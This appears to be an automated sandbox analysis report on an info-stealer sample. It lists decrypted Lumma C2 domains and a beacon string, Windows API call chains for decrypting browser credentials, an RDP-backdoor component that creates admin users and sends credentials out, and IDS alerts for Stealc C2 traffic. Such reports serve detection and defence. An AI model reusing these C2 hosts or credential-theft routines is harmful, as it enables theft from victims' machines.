Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wallkedsleeoi.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	4_2_00409B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	4_2_0040C820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	4_2_00407240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	4_2_00409AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	4_2_00418EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	4_2_6C2B6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C40A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	4_2_6C40A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C404440 PK11_PrivDecrypt,	4_2_6C404440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3D4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	4_2_6C3D4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C4044C0 PK11_PubEncrypt,	4_2_6C4044C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C4525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	4_2_6C4525B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C40A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	4_2_6C40A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3E8670 PK11_ExportEncryptedPrivKeyInfo,	4_2_6C3E8670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3EE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	4_2_6C3EE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	10_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	10_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	10_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,	10_2_0040A7D8

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49773 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressedlB]q source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: userBGIJEGCGDG.exe, 00000012.00000000.2213860525.0000000000832000.00000002.00000001.01000000.0000000C.sdmp, GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptyWj66qRZAtguDUcGmA5
Source:	Binary string: RfxVmt.pdb source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000000A.00000002.3007941787.0000000038646000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000000A.00000002.2999719026.000000002C769000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed@\]q source: GIEBGIIJDG.exe, 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2569131365.000000006C4DF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3299573060.000000002012B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: userBGIJEGCGDG.exe, 00000012.00000000.2213860525.0000000000832000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\rje\tg\fk\obj\Release\ojc.pdb source: file.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040E430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_00414910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_004016D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040F6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	4_2_004138B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	4_2_0040ED20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	10_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	10_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	10_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	10_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	10_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	10_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	10_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

10_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		10_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		10_2_004014AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49708 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49708 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49708 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49708 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2056176 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop) : 192.168.2.5:60401 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.5:49333 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.5:51313 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056177 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI) : 192.168.2.5:49710 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.5:49712 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.5:58362 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.5:49714 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.5:55707 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.5:49724 -> 188.114.96.3:443
